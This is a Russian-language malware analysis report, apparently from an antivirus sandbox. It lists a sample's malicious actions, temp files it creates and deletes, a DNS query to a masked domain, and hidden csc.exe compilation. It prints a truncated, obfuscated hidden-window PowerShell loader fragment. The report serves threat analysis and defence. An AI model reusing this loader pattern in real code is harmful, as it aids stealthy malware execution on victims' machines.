Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function v4ef21 { param($cf459) $q6d2b = 'f3a8c';$k79de = ''; for ($i = 0; $i -lt $cf459.length; $i+=2) { $g5a37e = [convert]::ToByte($cf459.Substring($i, 2), 16); $k...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\y1cl04bg.0.cs
- %TEMP%\y1cl04bg.cmdline
- %TEMP%\y1cl04bg.out
- %TEMP%\csccadd.tmp
- %TEMP%\rescafd.tmp
- %TEMP%\y1cl04bg.dll
Удаляет следующие файлы
- %TEMP%\rescafd.tmp
- %TEMP%\csccadd.tmp
- %TEMP%\y1cl04bg.cmdline
- %TEMP%\y1cl04bg.dll
- %TEMP%\y1cl04bg.pdb
- %TEMP%\y1cl04bg.out
- %TEMP%\y1cl04bg.0.cs
Сетевая активность
UDP
- DNS ASK me###group.pw
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y1cl04bg.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCAFD.tmp" "%TEMP%\CSCCADD.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\y1cl04bg.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCAFD.tmp" "%TEMP%\CSCCADD.tmp"
